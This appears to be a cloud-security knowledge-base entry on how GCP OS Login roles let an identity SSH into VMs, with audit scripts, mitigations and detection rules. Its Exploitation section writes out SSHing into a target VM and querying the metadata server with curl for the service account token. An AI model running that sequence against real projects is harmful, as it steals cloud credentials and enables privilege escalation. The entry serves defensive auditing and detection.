
# GCP\_CAN\_SSH\_VM

## Summary

|                            |                                                       |
| -------------------------- | ----------------------------------------------------- |
| **FSProtect ACL Alias**    | GCP\_CAN\_SSH\_VM                                     |
| **GCP Alias**              | Compute Execution & Pipeline Pivots                   |
| **Affected Object Types**  | Projects                                              |
| **Exploitation Certainty** | Likely                                                |
| **Granting Roles**         | `roles/compute.osLogin`, `roles/compute.osAdminLogin` |

## Description

`GCP_CAN_SSH_VM` indicates that an identity holds OS Login permissions (`roles/compute.osLogin` or `roles/compute.osAdminLogin`) which allow logging into existing GCE VMs via **OS Login**. OS Login ties SSH access to IAM identity, replacing traditional SSH key management. An attacker with this permission can log into any VM in the project (or org, if the role is scoped at that level) and interact with the OS.

## Identification

### gcloud CLI

```bash
PROJECT_ID="my-project"
VM_NAME="my-vm"        # placeholder: instance to inspect
ZONE="us-central1-a"   # placeholder: zone of that instance

# List VMs and their attached service accounts
gcloud compute instances list --project="$PROJECT_ID" \
  --format="table(name, zone.basename(), status, serviceAccounts[0].email)"

# Show each VM's own enable-oslogin metadata key, if set (empty means it inherits the project default)
gcloud compute instances list --project="$PROJECT_ID" --format=json | \
  jq -r '.[] | [.name, ((.metadata.items // []) | map(select(.key == "enable-oslogin")) | .[0].value // "inherits project")] | @tsv'

# Find who has OS Login permissions
gcloud projects get-iam-policy "$PROJECT_ID" --format=json | \
  jq '.bindings[] | select(.role | test("compute.osLogin|compute.osAdminLogin")) | {role: .role, members: .members}'

# Check if OS Login is enabled on the project
gcloud compute project-info describe --project="$PROJECT_ID" \
  --format="value(commonInstanceMetadata.items)" | grep enable-oslogin

# Check instance-level OS Login setting (overrides the project default)
gcloud compute instances describe "$VM_NAME" --zone="$ZONE" --project="$PROJECT_ID" \
  --format="value(metadata.items)" | grep enable-oslogin
```
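
The commands above leave the analyst to combine three outputs by hand: which VMs actually have OS Login in effect (instance metadata overrides the project default), who holds an OS Login role, and whether the attached service account makes a VM a high-value target. The script below does that join. It is an added example, not FSProtect's or Google's code; the input shapes follow the `--format=json` output of the three gcloud commands, and every sample record (project, principals, instance names, service accounts) is constructed for illustration.

```python
"""Audit OS Login exposure from exported gcloud JSON.

Added example (not FSProtect's or Google's code). Input shapes follow:
  gcloud compute instances list --project=PROJECT --format=json
  gcloud compute project-info describe --project=PROJECT --format=json
  gcloud projects get-iam-policy PROJECT --format=json
The inline samples are constructed for illustration.
"""
import json

OS_LOGIN_ROLES = {"roles/compute.osLogin", "roles/compute.osAdminLogin"}
CLOUD_PLATFORM_SCOPE = "https://www.googleapis.com/auth/cloud-platform"

# Constructed: project IAM policy with two OS Login bindings and one unrelated role
IAM_POLICY = json.loads("""{
  "bindings": [
    {"role": "roles/compute.osAdminLogin", "members": ["group:platform-admins@example.com"]},
    {"role": "roles/compute.osLogin",
     "members": ["user:dev@example.com", "serviceAccount:ci@my-project.iam.gserviceaccount.com"]},
    {"role": "roles/viewer", "members": ["user:auditor@example.com"]}
  ]
}""")

# Constructed: project-wide metadata enabling OS Login by default
PROJECT_INFO = json.loads("""{
  "commonInstanceMetadata": {"items": [{"key": "enable-oslogin", "value": "TRUE"}]}
}""")

# Constructed: web-1 opts out, bastion inherits the project default, builder opts in explicitly
INSTANCES = json.loads("""[
  {"name": "web-1", "status": "RUNNING",
   "zone": "https://www.googleapis.com/compute/v1/projects/my-project/zones/us-central1-a",
   "serviceAccounts": [{"email": "123456789012-compute@developer.gserviceaccount.com",
                        "scopes": ["https://www.googleapis.com/auth/cloud-platform"]}],
   "metadata": {"items": [{"key": "enable-oslogin", "value": "FALSE"}]}},
  {"name": "bastion", "status": "RUNNING",
   "zone": "https://www.googleapis.com/compute/v1/projects/my-project/zones/us-central1-a",
   "serviceAccounts": [{"email": "bastion-sa@my-project.iam.gserviceaccount.com",
                        "scopes": ["https://www.googleapis.com/auth/logging.write"]}],
   "metadata": {"items": []}},
  {"name": "builder", "status": "TERMINATED",
   "zone": "https://www.googleapis.com/compute/v1/projects/my-project/zones/us-east1-b",
   "serviceAccounts": [],
   "metadata": {"items": [{"key": "enable-oslogin", "value": "true"}]}}
]""")


def metadata_value(metadata, key):
    """Return the value of KEY from a GCE metadata block ({"items": [{"key", "value"}]}), or None."""
    for item in (metadata or {}).get("items") or []:
        if item.get("key") == key:
            return item.get("value")
    return None


def os_login_enabled(instance, project_info):
    """Effective OS Login state: an instance-level enable-oslogin key overrides the project default."""
    value = metadata_value(instance.get("metadata"), "enable-oslogin")
    if value is None:
        value = metadata_value(project_info.get("commonInstanceMetadata"), "enable-oslogin")
    return str(value).strip().lower() == "true"


def os_login_principals(policy):
    """Map each principal holding an OS Login role to the set of OS Login roles it holds."""
    holders = {}
    for binding in policy.get("bindings", []):
        if binding["role"] in OS_LOGIN_ROLES:
            for member in binding.get("members", []):
                holders.setdefault(member, set()).add(binding["role"])
    return holders


def sa_risk(instance):
    """Classify the attached SA: default compute SA and cloud-platform scope are the broad cases."""
    sas = instance.get("serviceAccounts") or []
    if not sas:
        return "none"
    if sas[0].get("email", "").endswith("-compute@developer.gserviceaccount.com"):
        return "default-compute-sa"
    if CLOUD_PLATFORM_SCOPE in sas[0].get("scopes", []):
        return "cloud-platform-scope"
    return "scoped"


def audit(instances, project_info, policy):
    """One finding per VM reachable through OS Login, with who can reach it and who gets sudo."""
    holders = os_login_principals(policy)
    findings = []
    for inst in instances:
        if not os_login_enabled(inst, project_info):
            continue
        findings.append({
            "instance": inst["name"],
            "zone": inst["zone"].rsplit("/", 1)[-1],
            "status": inst["status"],
            "service_account": sa_risk(inst),
            "reachable_by": sorted(holders),
            "sudo_capable": sorted(m for m, r in holders.items() if "roles/compute.osAdminLogin" in r),
        })
    return findings


if __name__ == "__main__":
    print(json.dumps(audit(INSTANCES, PROJECT_INFO, IAM_POLICY), indent=2))
```

Replace the three constructed constants with `json.load()` of the real command outputs to run it against a project. A VM that appears with `service_account` of `default-compute-sa` or `cloud-platform-scope` and a non-empty `sudo_capable` list is exactly the combination the Mitigation section below asks to eliminate.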

### GCP Console

1. Open **GCP Console** → **Compute Engine** → **VM Instances**.
2. Select a VM and look at the **SSH** button; when OS Login is enabled, that button authenticates through IAM, so any principal holding an OS Login role can open a session on the VM.
3. Check **IAM & Admin** → **IAM** for `Compute OS Login` or `Compute OS Admin Login` roles.

## Exploitation

### gcloud CLI

```bash
# Identify VMs running high-privilege service accounts
gcloud compute instances list --project=$PROJECT_ID \
  --format="table(name, zone, status, serviceAccounts[0].email)"

# Confirm OS Login is enabled
gcloud compute project-info describe --project=$PROJECT_ID \
  --format="value(commonInstanceMetadata.items)" | grep enable-oslogin

# Check for OS Login roles in project
gcloud projects get-iam-policy $PROJECT_ID --format=json | \
  jq '.bindings[] | select(.role | test("compute.osLogin|compute.osAdminLogin")) | {role: .role, members: .members}'

# SSH into the target VM
gcloud compute ssh VM_NAME --zone=us-central1-a --project=$PROJECT_ID

# Query the metadata server for the SA token from inside the VM
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
```

## Mitigation

1. **Scope OS Login roles narrowly** — assign at specific VM resource level rather than project-wide where possible.
2. **Use `roles/compute.osLogin`** (non-sudo) instead of `roles/compute.osAdminLogin` unless root access is needed.
3. **Attach minimal-privilege SAs to VMs** — VMs that don't need elevated GCP API access should use a dedicated low-privilege SA.
4. **Block metadata server access from VMs** that don't need it using custom metadata or network controls.

## Detection

| Log Type     | Method                               | Key Fields                   |
| ------------ | ------------------------------------ | ---------------------------- |
| Data Access  | `compute.instances.get` via OS Login | SSH connection attempts      |
| System Event | OS Login SSH auth                    | `resource.type=gce_instance` |

```bash
# Monitor OS Login authentication events
gcloud logging read \
  'resource.type="gce_instance" AND protoPayload.methodName=~"oslogin"' \
  --project=$PROJECT_ID \
  --format="table(timestamp, protoPayload.authenticationInfo.principalEmail, resource.labels.instance_id)"
```

Alert on:

* OS Login SSH connections to VMs running high-privilege SAs.
* SSH connections from unexpected geographic locations or IP ranges.
* Metadata server token requests shortly after an OS Login session begins.
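
The three alert conditions above, applied to constructed log records as an added example (not FSProtect's or Google's code). The Cloud Logging entries use the fields the `gcloud logging read` query above selects plus `protoPayload.requestMetadata.callerIp`, a standard audit-log field; the method name, principals, instance ids and addresses are all constructed. GCP does not log reads of the metadata server by default, so the third rule assumes a host-side sensor exporting token-request records in the constructed `TOKEN_REQUESTS` shape.

```python
"""Evaluate the OS Login alert rules over audit-log and host records.

Added example (not FSProtect's or Google's code). Log entries follow the
Cloud Logging LogEntry layout used by the detection query; all values are
constructed. TOKEN_REQUESTS is an assumed host-side feed, not a GCP log.
"""
import ipaddress
from datetime import datetime, timedelta

# Constructed: instance ids whose attached SA is considered high-privilege (e.g. from an inventory audit)
HIGH_PRIV_INSTANCES = {"4312": "123456789012-compute@developer.gserviceaccount.com"}
# Constructed: egress ranges from which interactive SSH is expected
EXPECTED_SOURCES = [ipaddress.ip_network("203.0.113.0/24")]
# How soon after an OS Login event a token fetch counts as suspicious
TOKEN_WINDOW = timedelta(minutes=5)

# Constructed Cloud Logging entries for OS Login activity
OSLOGIN_EVENTS = [
    {"timestamp": "2024-05-01T10:00:00Z",
     "resource": {"type": "gce_instance", "labels": {"instance_id": "4312"}},
     "protoPayload": {"methodName": "google.cloud.oslogin.v1.OsLoginService.ImportSshPublicKey",
                      "authenticationInfo": {"principalEmail": "dev@example.com"},
                      "requestMetadata": {"callerIp": "203.0.113.7"}}},
    {"timestamp": "2024-05-01T10:03:00Z",
     "resource": {"type": "gce_instance", "labels": {"instance_id": "9981"}},
     "protoPayload": {"methodName": "google.cloud.oslogin.v1.OsLoginService.ImportSshPublicKey",
                      "authenticationInfo": {"principalEmail": "ci@my-project.iam.gserviceaccount.com"},
                      "requestMetadata": {"callerIp": "198.51.100.23"}}},
]

# Constructed host-side records of token fetches from the metadata server
# (assumes an agent on the VM exports these; GCP itself does not log metadata reads)
TOKEN_REQUESTS = [
    {"timestamp": "2024-05-01T10:01:30Z", "instance_id": "4312",
     "path": "/computeMetadata/v1/instance/service-accounts/default/token"},
    {"timestamp": "2024-05-01T11:30:00Z", "instance_id": "9981",
     "path": "/computeMetadata/v1/instance/service-accounts/default/token"},
]


def parse_ts(value):
    """Parse an RFC 3339 timestamp with a trailing Z into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def is_expected_source(ip):
    """True when the caller address falls inside one of the expected egress ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in EXPECTED_SOURCES)


def evaluate(events, token_requests):
    """Return (rule, instance_id, principal, detail) tuples for every rule an event trips."""
    alerts = []
    for ev in events:
        payload = ev["protoPayload"]
        if ev["resource"]["type"] != "gce_instance" or "oslogin" not in payload["methodName"].lower():
            continue  # same selection as the gcloud logging query above
        inst = ev["resource"]["labels"]["instance_id"]
        who = payload["authenticationInfo"]["principalEmail"]
        ip = payload["requestMetadata"]["callerIp"]
        t0 = parse_ts(ev["timestamp"])

        # Rule 1: SSH to a VM whose attached SA is high-privilege
        if inst in HIGH_PRIV_INSTANCES:
            alerts.append(("high-privilege-sa", inst, who, HIGH_PRIV_INSTANCES[inst]))

        # Rule 2: login from outside the expected source ranges
        if not is_expected_source(ip):
            alerts.append(("unexpected-source", inst, who, ip))

        # Rule 3: SA token fetched from the metadata server shortly after the login
        for req in token_requests:
            if req["instance_id"] != inst or not req["path"].endswith("/token"):
                continue
            delta = parse_ts(req["timestamp"]) - t0
            if timedelta(0) <= delta <= TOKEN_WINDOW:
                alerts.append(("token-after-login", inst, who, req["timestamp"]))
    return alerts


if __name__ == "__main__":
    for alert in evaluate(OSLOGIN_EVENTS, TOKEN_REQUESTS):
        print("\t".join(alert))
```

Rules 1 and 2 run on Cloud Audit Logs alone; rule 3 only works where something on the host records calls to `metadata.google.internal`, which is why the second sample login (an SA token fetched 87 minutes later) produces no correlation alert while the first (90 seconds later) does.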

## References

* <https://cloud.google.com/compute/docs/oslogin/set-up-oslogin>
* <https://cloud.google.com/compute/docs/metadata/overview>
